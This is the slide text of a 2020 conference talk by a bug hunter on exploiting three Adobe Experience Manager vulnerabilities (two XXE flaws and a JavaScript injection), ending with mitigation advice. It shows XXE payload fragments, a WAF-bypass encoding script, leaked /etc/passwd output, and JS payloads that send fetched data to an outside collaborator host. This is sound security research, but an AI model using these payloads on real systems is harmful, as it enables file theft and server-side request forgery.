Slide 1

Slide 1 text

EUROPE'S LEADING AEM DEVELOPER CONFERENCE 28th – 30th SEPTEMBER 2020 A Hacker's perspective on AEM applications security Mikhail Egorov, Security researcher & bug hunter

Slide 2

Slide 2 text

2 Intro

Slide 3

Slide 3 text

whoami 3 ▪ Security researcher & full-time bug hunter ▪ https://bugcrowd.com/0ang3el ▪ https://hackerone.com/0ang3el ▪ Conference speaker ▪ https://www.slideshare.net/0ang3el ▪ https://speakerdeck.com/0ang3el

Slide 4

Slide 4 text

whoami 4 ▪ Toolset for AEM hacking ▪ https://github.com/0ang3el/aem-hacker

Slide 5

Slide 5 text

5 APSB19-48

Slide 6

Slide 6 text

APSB19-48 6 ▪ http://helpx.adobe.com/security/products/experi ence-manager/apsb19-48.html ▪ CVE-2019-8086 / XML eXternal Entity Injection ▪ CVE-2019-8087 / XML eXternal Entity Injection ▪ CVE-2019-8088 / JavaScript Code Injection

Slide 7

Slide 7 text

XML eXternal Entity (XXE) attacks 7 ▪ Do we see the parsed XML? ▪ What’s allowed by the XML parser? ▪ General external entities ▪ Parameter external entities ▪ External DTD loading

Slide 8

Slide 8 text

XML eXternal Entity (XXE) attacks 8 ]> &xxe; root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync …

Slide 9

Slide 9 text

XML eXternal Entity (XXE) attacks 9 %xxe; ]>

Slide 10

Slide 10 text

XML eXternal Entity (XXE) attacks 10

Slide 11

Slide 11 text

CVE-2019-8086 11 ▪ GuideInternalSubmitServlet @Service({Servlet.class}) @Properties({@Property( name = "sling.servlet.resourceTypes", value = {"fd/af/components/guideContainer"} ), @Property( name = "sling.servlet.methods", value = {"POST"} ), @Property( name = "sling.servlet.selectors", value = {"af.internalsubmit"} )}) public class GuideInternalSubmitServlet …

Slide 12

Slide 12 text

CVE-2019-8086 12

Slide 13

Slide 13 text

CVE-2019-8086 13

Slide 14

Slide 14 text

CVE-2019-8086 14 ▪ XXE payload ]> &a;

Slide 15

Slide 15 text

CVE-2019-8086 15

Slide 16

Slide 16 text

CVE-2019-8086 16 ▪ Exploitation hints ▪ We can JSON-encode XXE payload to bypass a WAF ▪ In Java we can list directory content ▪ /proc/self/cwd

Slide 17

Slide 17 text

CVE-2019-8086 17 ▪ JSON-encoding data = ']>&a;' result = "“ for c in data: result = result + "\\u00%02x" % ord(c) print result

Slide 18

Slide 18 text

CVE-2019-8086 18

Slide 19

Slide 19 text

CVE-2019-8086 19 ▪ XXE payload ]> &a;

Slide 20

Slide 20 text

CVE-2019-8086 20

Slide 21

Slide 21 text

CVE-2019-8086 21 ▪ Exploitation requirements ▪ There should be a node with fd/af/components/guideContainer resource type ▪ property=sling:resourceType&property.value=fd/af/comp onents/guideContainer ▪ Attacker should have a jcr:write access somewhere ▪ /content/usergenerated/etc/commerce/smartlists/

Slide 22

Slide 22 text

CVE-2019-8086 22 ▪ Exploitation requirements ▪ Doesn’t work equally on different AEM versions ▪ Only blind SSRF for some versions

Slide 23

Slide 23 text

CVE-2019-8087 23 ▪ WSDLInvokerServlet @Service({Servlet.class}) @Properties({@Property( name = "sling.servlet.resourceTypes", value = {"fd/af/components/guideContainer"} ), @Property( name = "sling.servlet.selectors", value = {"af.wsdl"} ), @Property( name = "sling.servlet.methods", value = {"POST"} )}) public class WSDLInvokerServlet …

Slide 24

Slide 24 text

CVE-2019-8087 24

Slide 25

Slide 25 text

CVE-2019-8087 25

Slide 26

Slide 26 text

CVE-2019-8087 26 ▪ WSDL example ▪ https://cs.au.dk/~amoeller/WWW/webservices/wsdlexample.html

Slide 27

Slide 27 text

CVE-2019-8087 27

Slide 28

Slide 28 text

CVE-2019-8087 28 ▪ Malicious xxe.wsdl %dtd; %param1; ]> …

Slide 29

Slide 29 text

CVE-2019-8087 29 ▪ Malicious loot.dtd ">

Slide 30

Slide 30 text

CVE-2019-8087 30

Slide 31

Slide 31 text

CVE-2019-8087 31 ▪ Exploitation requirements ▪ There should be a node with fd/af/components/guideContainer resource type ▪ property=sling:resourceType&property.value=fd/af/comp onents/guideContainer ▪ Attacker should have a jcr:write access somewhere ▪ /content/usergenerated/etc/commerce/smartlists/

Slide 32

Slide 32 text

CVE-2019-8087 32 ▪ Exploitation requirements ▪ Doesn’t work equally on different AEM versions ▪ On some AEM versions WSDLInvokerServlet is not present

Slide 33

Slide 33 text

CVE-2019-8088 33 ▪ GuideSubmitServlet @Service({Servlet.class}) @Properties({@Property( name = "sling.servlet.resourceTypes", value = {"fd/af/components/guideContainer"} ), @Property( name = "sling.servlet.methods", value = {"POST"} ), @Property( name = "sling.servlet.selectors", value = {"af.submit", "af.agreement", "af.signSubmit"} )}) public class GuideSubmitServlet extends SlingAllMethodsServlet { …

Slide 34

Slide 34 text

CVE-2019-8088 34

Slide 35

Slide 35 text

CVE-2019-8088 35

Slide 36

Slide 36 text

CVE-2019-8088 36

Slide 37

Slide 37 text

CVE-2019-8088 37

Slide 38

Slide 38 text

CVE-2019-8088 38

Slide 39

Slide 39 text

CVE-2019-8088 39 ▪ Sandboxed Rhino engine on some AEM versions ▪ No RCE ▪ Sandbox allows network interactions ▪ SSRF w/ ability to see the response

Slide 40

Slide 40 text

CVE-2019-8088 40 ▪ JS payload ');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollabo rator.net');//

Slide 41

Slide 41 text

CVE-2019-8088 41

Slide 42

Slide 42 text

CVE-2019-8088 42

Slide 43

Slide 43 text

CVE-2019-8088 43 ▪ JS payload ');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollabo rator.net',function(data){jQuery.get('http://727a14ifhq8on9vakss k6agtlkrafz.burpcollaborator.net',{loot:data})});//

Slide 44

Slide 44 text

CVE-2019-8088 44

Slide 45

Slide 45 text

CVE-2019-8088 45

Slide 46

Slide 46 text

CVE-2019-8088 46 ▪ Exploitation requirements ▪ There should be a node with fd/af/components/guideContainer resource type ▪ property=sling:resourceType&property.value=fd/af/comp onents/guideContainer ▪ Attacker should have a jcr:write access somewhere ▪ /content/usergenerated/etc/commerce/smartlists/

Slide 47

Slide 47 text

CVE-2019-8088 47 ▪ Exploitation requirements ▪ Doesn’t work equally on different AEM versions ▪ RCE or SSRF

Slide 48

Slide 48 text

APSB19-48 48 ▪ Keep AEM up to date ▪ http://helpx.adobe.com/security/products/experie nce-manager/apsb19-48.html ▪ Block jcr:write access for anonymous user ▪ /content/usergenerated/etc/commerce/smartlists/ ▪ Remove demo content (Geometrixx, WeRetail, …)

Slide 49

Slide 49 text

49 Thank you @0ang3el